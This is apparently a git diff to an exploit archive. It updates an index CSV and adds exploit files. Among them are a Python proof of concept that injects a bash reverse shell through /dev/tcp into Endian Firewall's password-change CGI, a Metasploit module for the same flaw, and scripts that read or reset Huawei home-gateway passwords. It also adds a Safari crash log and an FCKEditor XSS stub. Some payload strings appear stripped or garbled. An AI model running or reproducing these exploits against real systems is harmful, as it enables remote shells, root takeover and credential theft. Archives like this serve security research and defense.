diff --git a/files.csv b/files.csv
index 190ae5b8f..7d669c4bd 100755
--- a/files.csv
+++ b/files.csv
@@ -24567,7 +24567,7 @@ id,file,description,date,author,platform,type,port
27452,platforms/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN Cross-Site Scripting Vulnerability",2006-03-21,"ILION Research",hardware,remote,0
27453,platforms/php/webapps/27453.txt,"PHP Live! 3.0 Status_Image.PHP Cross-Site Scripting Vulnerability",2006-03-22,kspecial,php,webapps,0
27454,platforms/php/webapps/27454.txt,"Motorola Bluetooth Interface Dialog Spoofing Vulnerability",2006-03-22,kspecial,php,webapps,0
-27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 viewEvent.cfm EventID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0
+27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 - viewEvent.cfm EventID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0
27456,platforms/cfm/webapps/27456.txt,"1WebCalendar 4.0 /news/newsView.cfm NewsID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0
27457,platforms/cfm/webapps/27457.txt,"1WebCalendar 4.0 mainCal.cfm SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0
27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 Img.PHP Cross-Site Scripting Vulnerability",2006-03-23,FarhadKey,php,webapps,0
@@ -33739,6 +33739,7 @@ id,file,description,date,author,platform,type,port
37382,platforms/php/webapps/37382.php,"Joomla! jFancy Component 'script.php' Arbitrary File Upload Vulnerability",2012-06-13,"Sammy FORGIT",php,webapps,0
37383,platforms/php/webapps/37383.php,"Joomla! Easy Flash Uploader Component 'helper.php' Arbitrary File Upload Vulnerability",2012-06-12,"Sammy FORGIT",php,webapps,0
37384,platforms/lin_x86-64/shellcode/37384.c,"Linux x86 - execve /bin/sh (23 Bytes)",2015-06-26,"Bill Borskey",lin_x86-64,shellcode,0
+37386,platforms/osx/dos/37386.php,"Safari 8.0.X / OS X Yosemite 10.10.3 - Crash Proof Of Concept",2015-06-26,"Mohammad Reza Espargham",osx,dos,0
37387,platforms/php/webapps/37387.txt,"Koha <= 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
37388,platforms/php/webapps/37388.txt,"Koha <= 3.20.1 - Path Traversal",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
37389,platforms/php/webapps/37389.txt,"Koha <= 3.20.1 - Multiple XSS and XSRF Vulnerabilities",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
@@ -33773,7 +33774,11 @@ id,file,description,date,author,platform,type,port
37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection Vulnerability",2012-06-18,"Black Hat Group",php,webapps,0
+37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
+37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change Vulnerability",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
+37426,platforms/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python PoC)",2015-06-29,"Ben Lincoln",cgi,remote,0
37427,platforms/linux/shellcode/37427.txt,"encoded 64 bit execve shellcode",2015-06-29,"Bill Borskey",linux,shellcode,0
+37428,platforms/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit Module)",2015-06-29,"Ben Lincoln",cgi,remote,0
37430,platforms/php/webapps/37430.txt,"CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2012-06-19,TheCyberNuxbie,php,webapps,0
37431,platforms/php/webapps/37431.php,"e107 Hupsi_fancybox Plugin 'uploadify.php' Arbitrary File Upload Vulnerability",2012-06-19,"Sammy FORGIT",php,webapps,0
37432,platforms/php/webapps/37432.txt,"e107 Image Gallery Plugin 'name' Parameter Remote File Disclosure Vulnerability",2012-06-19,"Sammy FORGIT",php,webapps,0
@@ -33799,3 +33804,11 @@ id,file,description,date,author,platform,type,port
37453,platforms/php/webapps/37453.php,"Drupal Drag & Drop Gallery 'upload.php' Arbitrary File Upload Vulnerability",2012-06-25,"Sammy FORGIT",php,webapps,0
37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0
37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0
+37457,platforms/php/webapps/37457.html,"FCKEditor 'spellchecker.php' Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
+37458,platforms/windows/dos/37458.pl,"Winamp 5.13 '.m3u' File Exception Handling Remote Denial of Service Vulnerability",2012-06-25,Dark-Puzzle,windows,dos,0
+37459,platforms/php/webapps/37459.txt,"Umapresence Local File Include and Arbitrary File Deletion Vulnerabilities",2012-06-25,"Sammy FORGIT",php,webapps,0
+37460,platforms/php/webapps/37460.txt,"Schoolhos CMS HTML Injection Vulnerabilities",2012-06-27,the_cyber_nuxbie,php,webapps,0
+37461,platforms/php/webapps/37461.txt,"DigPHP 'dig.php' Script Remote File Disclosure Vulnerability",2012-06-26,"Ryuzaki Lawlet",php,webapps,0
+37462,platforms/windows/dos/37462.pl,"VLC Media Player 2.0.1 '.avi' File Denial of Service Vulnerability",2012-06-28,Dark-Puzzle,windows,dos,0
+37463,platforms/windows/dos/37463.pl,"Real Networks RealPlayer '.avi' File Divide-By-Zero Denial of Service Vulnerability",2012-06-28,Dark-Puzzle,windows,dos,0
+37464,platforms/php/webapps/37464.txt,"WordPress Albo Pretorio Online 3.2 - Multiple Vulnerabilities",2015-07-02,"Alessandro Cingolani",php,webapps,80
diff --git a/platforms/cgi/remote/37426.py b/platforms/cgi/remote/37426.py
new file mode 100755
index 000000000..758ed7c36
--- /dev/null
+++ b/platforms/cgi/remote/37426.py
@@ -0,0 +1,75 @@
+#!/usr/bin/env python
+
+# Endian Firewall Proxy User Password Change (/cgi-bin/chpasswd.cgi)
+# OS Command Injection Exploit POC (Reverse TCP Shell)
+# Ben Lincoln, 2015-06-28
+# http://www.beneaththewaves.net/
+# Requires knowledge of a valid proxy username and password on the target Endian Firewall
+
+import httplib
+import sys
+
+proxyUserPasswordChangeURI = "/cgi-bin/chpasswd.cgi"
+
+def main():
+ if len(sys.argv) < 7:
+ print "Endian Firewall Proxy User Password Change (/cgi-bin/chpasswd.cgi) Exploit\r\n"
+ print "Usage: " + sys.argv[0] + " [TARGET_SYSTEM_IP] [TARGET_SYSTEM_WEB_PORT] [PROXY_USER_NAME] [PROXY_USER_PASSWORD] [REVERSE_SHELL_IP] [REVERSE_SHELL_PORT]\r\n"
+ print "Example: " + sys.argv[0] + " 172.16.97.1 10443 proxyuser password123 172.16.97.17 443\r\n"
+ print "Be sure you've started a TCP listener on the specified IP and port to receive the reverse shell when it connects.\r\n"
+ print "E.g. ncat -nvlp 443"
+ sys.exit(1)
+
+ multipartDelimiter = "---------------------------334002631541493081770656718"
+
+ targetIP = sys.argv[1]
+ targetPort = sys.argv[2]
+ userName = sys.argv[3]
+ password = sys.argv[4]
+ reverseShellIP = sys.argv[5]
+ reverseShellPort = sys.argv[6]
+
+ exploitString = password + "; /bin/bash -c /bin/bash -i >& /dev/tcp/" + reverseShellIP + "/" + reverseShellPort + " 0>&1;"
+
+ endianURL = "https://" + targetIP + ":" + targetPort + proxyUserPasswordChangeURI
+
+ conn = httplib.HTTPSConnection(targetIP, targetPort)
+ headers = {}
+ headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0"
+ headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
+ headers["Accept-Encoding"] = ""
+ headers["Referer"] = "https://" + targetIP + ":" + targetPort + proxyUserPasswordChangeURI
+ headers["Content-Type"] = "multipart/form-data; boundary=" + multipartDelimiter
+ headers["Accept-Language"] = "en-US,en;q=0.5"
+ headers["Connection"] = "keep-alive"
+
+ multipartDelimiter = "--" + multipartDelimiter
+
+ body = multipartDelimiter + "\r\n"
+ body = body + "Content-Disposition: form-data; name=\"ACTION\"\r\n\r\n"
+ body = body + "change\r\n"
+ body = body + multipartDelimiter + "\r\n"
+ body = body + "Content-Disposition: form-data; name=\"USERNAME\"\r\n\r\n"
+ body = body + userName + "\r\n"
+ body = body + multipartDelimiter + "\r\n"
+ body = body + "Content-Disposition: form-data; name=\"OLD_PASSWORD\"\r\n\r\n"
+ body = body + password + "\r\n"
+ body = body + multipartDelimiter + "\r\n"
+ body = body + "Content-Disposition: form-data; name=\"NEW_PASSWORD_1\"\r\n\r\n"
+ body = body + exploitString + "\r\n"
+ body = body + multipartDelimiter + "\r\n"
+ body = body + "Content-Disposition: form-data; name=\"NEW_PASSWORD_2\"\r\n\r\n"
+ body = body + exploitString + "\r\n"
+ body = body + multipartDelimiter + "\r\n"
+ body = body + "Content-Disposition: form-data; name=\"SUBMIT\"\r\n\r\n"
+ body = body + " Change password\r\n"
+ body = body + multipartDelimiter + "--" + "\r\n"
+
+ conn.request("POST", proxyUserPasswordChangeURI, body, headers)
+ response = conn.getresponse()
+ print "HTTP " + str(response.status) + " " + response.reason + "\r\n"
+ print response.read()
+ print "\r\n\r\n"
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/platforms/cgi/remote/37428.txt b/platforms/cgi/remote/37428.txt
new file mode 100755
index 000000000..aed2b311c
--- /dev/null
+++ b/platforms/cgi/remote/37428.txt
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Endian Firewall < 3.0.0 Proxy Password Change Command Injection',
+ 'Description' => %q{
+ This module exploits an OS command injection vulnerability in a
+ web-accessible CGI script used to change passwords for locally-defined
+ proxy user accounts. Valid credentials for such an account are
+ required.
+ Command execution will be in the context of the "nobody" account, but
+ on versions of EFW I tested, this account had broad sudo permissions,
+ including to run the script /usr/local/bin/chrootpasswd as root. This
+ script changes the password for the Linux root account on the system
+ to the value specified by console input once it is executed.
+ The password for the proxy user account specified will *not* be
+ changed by the use of this module, as long as the target system is
+ vulnerable to the exploit.
+ Very early versions of Endian Firewall (e.g. 1.1 RC5) require
+ HTTP basic auth credentials as well to exploit this vulnerability.
+ Use the standard USERNAME and PASSWORD advanced options to specify
+ these values if required.
+ Versions >= 3.0.0 still contain the vulnerable code, but it appears to
+ never be executed due to a bug in the vulnerable CGI script which also
+ prevents normal use.
+ Tested successfully against the following versions of EFW Community:
+ 1.1 RC5, 2.0, 2.1, 2.5.1, 2.5.2.
+ Used Apache mod_cgi Bash Environment Variable Code Injection
+ and Novell ZENworks Configuration Management Remote Execution
+ modules as templates.
+ },
+ 'Author' => [
+ 'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module
+ ],
+ 'References' => [
+# ['CVE', ''],
+# ['OSVDB', ''],
+# ['EDB', ''],
+ ['URL', 'http://jira.endian.com/browse/COMMUNITY-136']
+ ],
+ 'Privileged' => false,
+ 'Platform' => %w{ linux },
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x0a\x0d",
+ 'DisableNops' => true,
+ 'Space' => 2048
+ },
+ 'Targets' =>
+ [
+ [ 'Linux x86',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ 'CmdStagerFlavor' => [ :echo, :printf ]
+ }
+ ],
+ [ 'Linux x86_64',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86_64,
+ 'CmdStagerFlavor' => [ :echo, :printf ]
+ }
+ ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'SSL' => true,
+ 'RPORT' => 10443
+ },
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jun 28 2015',
+ 'License' => MSF_LICENSE
+ ))
+
+ register_options([
+ OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script',
+ '/cgi-bin/chpasswd.cgi']),
+ OptString.new('EFW_USERNAME', [true,
+ 'Valid proxy account username for the target system']),
+ OptString.new('EFW_PASSWORD', [true,
+ 'Valid password for the proxy user account']),
+ OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 200]),
+ OptString.new('RPATH', [true,
+ 'Target PATH for binaries used by the CmdStager', '/bin']),
+ OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 10])
+ ], self.class)
+ end
+
+ def exploit
+ # Cannot use generic/shell_reverse_tcp inside an elf
+ # Checking before proceeds
+ if generate_payload_exe.blank?
+ fail_with(Failure::BadConfig,
+ "#{peer} - Failed to store payload inside executable, " +
+ "please select a native payload")
+ end
+
+ execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'],
+ :nodelete => true)
+ end
+
+ def execute_command(cmd, opts)
+ cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
+
+ req(cmd)
+ end
+
+ def req(cmd)
+ sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};"
+
+ boundary = "----#{rand_text_alpha(34)}"
+ data = "--#{boundary}\r\n"
+ data << "Content-Disposition: form-data; name=\"ACTION\"\r\n\r\n"
+ data << "change\r\n"
+ data << "--#{boundary}\r\n"
+ data << "Content-Disposition: form-data; name=\"USERNAME\"\r\n\r\n"
+ data << "#{datastore['EFW_USERNAME']}\r\n"
+ data << "--#{boundary}\r\n"
+ data << "Content-Disposition: form-data; name=\"OLD_PASSWORD\"\r\n\r\n"
+ data << "#{datastore['EFW_PASSWORD']}\r\n"
+ data << "--#{boundary}\r\n"
+ data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_1\"\r\n\r\n"
+ data << "#{sploit}\r\n"
+ data << "--#{boundary}\r\n"
+ data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_2\"\r\n\r\n"
+ data << "#{sploit}\r\n"
+ data << "--#{boundary}\r\n"
+ data << "Content-Disposition: form-data; name=\"SUBMIT\"\r\n\r\n"
+ data << " Change password\r\n"
+ data << "--#{boundary}--\r\n"
+
+ refererUrl =
+ "https://#{datastore['RHOST']}:#{datastore['RPORT']}" +
+ "#{datastore['TARGETURI']}"
+
+ send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => datastore['TARGETURI'],
+ 'ctype' => "multipart/form-data; boundary=#{boundary}",
+ 'headers' => {
+ 'Referer' => refererUrl
+ },
+ 'data' => data
+ }, datastore['TIMEOUT'])
+
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/hardware/webapps/37424.py b/platforms/hardware/webapps/37424.py
new file mode 100755
index 000000000..e2e0d6566
--- /dev/null
+++ b/platforms/hardware/webapps/37424.py
@@ -0,0 +1,56 @@
+#! /usr/bin/python
+
+# Exploit Title: Huawei Home Gateway password disclosure
+# Date: June 27, 2015
+# Exploit Author: Fady Mohamed Osman (@fady_osman)
+# Vendor Homepage: http://www.huawei.com/en/
+# Software Link: N/A.
+# Version: UPnP/1.0 IGD/1.00
+# Tested on: HG530 - HG520b (Provided by TE-DATA egypt)
+# Exploit-db : http://www.exploit-db.com/author/?a=2986
+# Youtube : https://www.youtube.com/user/cutehack3r
+
+import socket
+import sys
+import re
+
+if len(sys.argv) !=2:
+ print "[*] Please enter the target ip."
+ print "[*] Usage : " + sys.argv[0] + " IP_ADDR"
+ exit()
+# Create a TCP/IP socket
+target_host = sys.argv[1]
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+# Connect the socket to the port where the server is listening
+server_address = (target_host, 80)
+print >>sys.stderr, '[*] Connecting to %s port %s' % server_address
+sock.connect(server_address)
+try:
+ soap = ""
+ soap +=""
+ soap +=""
+ soap +=""
+ soap +=""
+ soap +=""
+ soap +=""
+ message = "POST /UD/?5 HTTP/1.1\r\n"
+ message += "SOAPACTION: \"urn:dslforum-org:service:UserInterface:1#GetLoginPassword\"\r\n"
+ message += "Content-Type: text/xml; charset=\"utf-8\"\r\n"
+ message += "Host:" + target_host + "\r\n"
+ message += "Content-Length:" + str(len(soap)) +"\r\n"
+ message += "Expect: 100-continue\r\n"
+ message += "Connection: Keep-Alive\r\n\r\n"
+ sock.send(message)
+ data = sock.recv(1024)
+ print "[*] Recieved : " + data.strip()
+ sock.send(soap)
+ data = sock.recv(1024)
+ data += sock.recv(1024)
+ #print data
+ r = re.compile('(.*?)')
+ m = r.search(data)
+ if m:
+ print "[*] Found the password: " + m.group(1)
+finally:
+ sock.close()
diff --git a/platforms/hardware/webapps/37425.py b/platforms/hardware/webapps/37425.py
new file mode 100755
index 000000000..2c75a3d41
--- /dev/null
+++ b/platforms/hardware/webapps/37425.py
@@ -0,0 +1,55 @@
+#! /usr/bin/python
+
+# Exploit Title: Huawei Home Gateway password change vulnerability
+# Date: June 27, 2015
+# Exploit Author: Fady Mohamed Osman (@fady_osman)
+# Vendor Homepage: http://www.huawei.com/en/
+# Software Link: N/A.
+# Version: UPnP/1.0 IGD/1.00
+# Tested on: HG530 - HG520b (Provided by TE-DATA egypt)
+# Exploit-db : http://www.exploit-db.com/author/?a=2986
+# Youtube : https://www.youtube.com/user/cutehack3r
+
+import socket
+import sys
+import re
+
+if len(sys.argv) !=3:
+ print "[*] Please enter the target ip and the new password."
+ print "[*] Usage : " + sys.argv[0] + " IP_ADDR NEW_PASS"
+ exit()
+
+# Create a TCP/IP socket
+target_host = sys.argv[1]
+new_pass = sys.argv[2]
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+# Connect the socket to the port where the server is listening
+server_address = (target_host, 80)
+print >>sys.stderr, '[*] Connecting to %s port %s' % server_address
+sock.connect(server_address)
+try:
+ soap = ""
+ soap +=""
+ soap +=""
+ soap +=""
+ soap +=""+new_pass+""
+ soap +=""
+ soap +=""
+ soap +=""
+ message = "POST /UD/?5 HTTP/1.1\r\n"
+ message += "SOAPACTION: \"urn:dslforum-org:service:UserInterface:1#SetLoginPassword\"\r\n"
+ message += "Content-Type: text/xml; charset=\"utf-8\"\r\n"
+ message += "Host:" + target_host + "\r\n"
+ message += "Content-Length: " + str(len(soap)) + "\r\n"
+ message += "Expect: 100-continue\r\n"
+ message += "Connection: Keep-Alive\r\n\r\n"
+ sock.send(message)
+ data = sock.recv(1024)
+ print "[*] Recieved : " + data.strip()
+ sock.send(soap)
+ data = sock.recv(1024)
+ data += sock.recv(1024)
+ print "[*] Done."
+finally:
+ sock.close()
diff --git a/platforms/osx/dos/37386.php b/platforms/osx/dos/37386.php
new file mode 100755
index 000000000..31df6c4f6
--- /dev/null
+++ b/platforms/osx/dos/37386.php
@@ -0,0 +1,204 @@
+#!/usr/bin/php
+ const&,
+WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo
+const&, unsigned int, WebCore::RenderObject*) + 370
+25 com.apple.WebCore 0x0000000104e50f87
+WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector const&, WebCore::GraphicsContext*,
+WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool,
+WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int,
+WebCore::RenderObject*, bool, bool) + 423
+26 com.apple.WebCore 0x0000000104e4fc30
+WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*,
+WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576
+27 com.apple.WebCore 0x0000000104e4f002
+WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*,
+WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
+28 com.apple.WebCore 0x0000000104e4fd62
+WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*,
+WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882
+29 com.apple.WebCore 0x0000000104e7ac36
+WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer
+const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned
+int, unsigned int) + 358
+30 com.apple.WebCore 0x000000010593757f
+WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer
+const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect
+const&) + 799
+31 com.apple.WebCore 0x000000010537dd44
+WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&,
+WebCore::FloatRect const&) + 132
+32 com.apple.WebCore 0x00000001058b6ad9
+WebCore::PlatformCALayer::drawLayerContents(CGContext*,
+WebCore::PlatformCALayer*, WTF::Vector&) + 361
+33 com.apple.WebCore 0x0000000105b170a7
+WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*,
+WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
+34 com.apple.WebCore 0x0000000105ba36cc -[WebSimpleLayer
+drawInContext:] + 172
+35 com.apple.QuartzCore 0x00007fff8d7033c7
+CABackingStoreUpdate_ + 3306
+36 com.apple.QuartzCore 0x00007fff8d7026d7
+___ZN2CA5Layer8display_Ev_block_invoke + 59
+37 com.apple.QuartzCore 0x00007fff8d702694
+x_blame_allocations + 81
+38 com.apple.QuartzCore 0x00007fff8d6f643c
+CA::Layer::display_() + 1546
+39 com.apple.WebCore 0x0000000105ba35eb -[WebSimpleLayer
+display] + 43
+40 com.apple.QuartzCore 0x00007fff8d6f47fd
+CA::Layer::display_if_needed(CA::Transaction*) + 603
+41 com.apple.QuartzCore 0x00007fff8d6f3e81
+CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
+42 com.apple.QuartzCore 0x00007fff8d6f3612
+CA::Context::commit_transaction(CA::Transaction*) + 242
+43 com.apple.QuartzCore 0x00007fff8d6f33ae
+CA::Transaction::commit() + 390
+44 com.apple.QuartzCore 0x00007fff8d701f19
+CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long,
+void*) + 71
+45 com.apple.CoreFoundation 0x00007fff869f7127
+__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
+46 com.apple.CoreFoundation 0x00007fff869f7080
+__CFRunLoopDoObservers + 368
+47 com.apple.CoreFoundation 0x00007fff869e8bf8
+CFRunLoopRunSpecific + 328
+48 com.apple.HIToolbox 0x00007fff8df1156f
+RunCurrentEventLoopInMode + 235
+49 com.apple.HIToolbox 0x00007fff8df112ea
+ReceiveNextEventCommon + 431
+50 com.apple.HIToolbox 0x00007fff8df1112b
+_BlockUntilNextEventMatchingListInModeWithFilter + 71
+51 com.apple.AppKit 0x00007fff8ebe59bb _DPSNextEvent +
+978
+52 com.apple.AppKit 0x00007fff8ebe4f68 -[NSApplication
+nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
+53 com.apple.AppKit 0x00007fff8ebdabf3 -[NSApplication
+run] + 594
+54 com.apple.AppKit 0x00007fff8eb57354 NSApplicationMain
++ 1832
+55 libxpc.dylib 0x00007fff8ab77958 _xpc_objc_main +
+793
+56 libxpc.dylib 0x00007fff8ab79060 xpc_main + 490
+57 com.apple.WebKit.WebContent 0x0000000103f10b40 0x103f10000 + 2880
+58 libdyld.dylib 0x00007fff873e45c9 start + 1
+*/
+?>
diff --git a/platforms/php/webapps/37457.html b/platforms/php/webapps/37457.html
new file mode 100755
index 000000000..59f016edb
--- /dev/null
+++ b/platforms/php/webapps/37457.html
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/54188/info
+
+FCKEditor is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+FCKEditor 2.6.7 is vulnerable; prior versions may also be affected.
+
+html>